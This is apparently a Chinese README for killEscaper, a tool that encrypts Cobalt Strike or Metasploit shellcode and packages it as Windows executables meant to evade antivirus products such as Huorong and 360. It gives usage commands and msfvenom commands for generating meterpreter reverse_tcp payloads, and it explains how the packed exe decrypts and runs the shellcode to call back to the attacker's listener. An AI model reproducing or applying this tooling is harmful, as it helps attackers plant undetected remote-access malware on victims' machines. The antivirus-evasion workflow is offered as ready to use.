killEscaper 是一个利用shellcode来制作免杀exe的工具，可结合渗透工具生成的shellcode二次转换exe，支持红队常用渗透工具CobaltStrike、metasploit等，测试可以绕过火绒、360等杀软，操作系统位数支持32、64位。

    当前处于测试阶段，任何问题欢迎公众号留言

    工具仅支持Windows 且python版本需为python3.x

项目拉取：

git clone https://github.com/Anyyy111/killEscaper

模块安装：

   脚本调用的模块都是原生库，注意安装 pyinstaller 即可。

 pip install pyinstaller

   并添加 pyinstaller 至系统环境变量。

_    _ _ _ _____| | _(_) | | ____|___  ___ __ _ _ __   ___ _ __| |/ / | | |  _| / __|/ __/ _` | '_ \ / _ \ '__||   <| | | | |___\__ \ (_| (_| | |_) |  __/ ||_|\_\_|_|_|_____|___/\___\__,_| .__/ \___|_|                               |_|    @Title: killEscaper_ShellCode免杀生成器    @Author: Anyyy    @Blog: https://www.anyiblog.top/    @env：Windows系统、Python3



usage: python killEscaper.py -a <32/64> -f <ShellCode File> -i <Icon file>

使用说明：

optional arguments:  -h, --help            show this help message and exit  -a ARCH, --arch ARCH  shellcode对应的操作系统位数 默认为64位  -f FILE, --file FILE  任何包含shellcode的Payload文件 用于读取并生成  -i ICON, --icon ICON  exe的Icon图标  -c, --clean           清理output输出文件

根据shellcode生成64位的exe执行文件

python killescaper -f payload64.c #根据shellcode生成64位的exe执行文件

根据shellcode生成32位的exe执行文件：

python killescaper -a 32 -f payload32.c #根据shellcode生成32位的exe执行文件

自定义图标：

python killescaper -a 64 -f payload64.c -i logo.ico #生成一个以logo.ico为图标的exe执行文件

清理输出文件夹：

python killescaper --clean #清理output/所有文件

metasploit生成免杀

只讲生成免杀的步骤，执行及如何返回监听请查看 效果演示 的视频。

1.msfvenom生成shellcode

x64:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=IP lport=PORT -f python -a x64 > shellcode.txt

x32:

msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=PORT -f python -a x86 > shellcode.txt

python killEscaper.py -a 64 -f payload64.c

    程序会将shellcode进行加密，会生成cipher密文和key密钥，密文和密钥每次生成都不同。

    模板中定义了解密模块，需要对应的密文密钥才能解密，再将解密后的Payload执行，即执行恶意shellcode返回至监听的cs或msf。

    模板写好后再写到python文件中，利用pyinstaller打包成exe，算法绕过了杀软的检测 同时执行shellcode，便成功实现了免杀执行。

    算法部分参考免杀工具 BypassAV 的算法并进行了优化。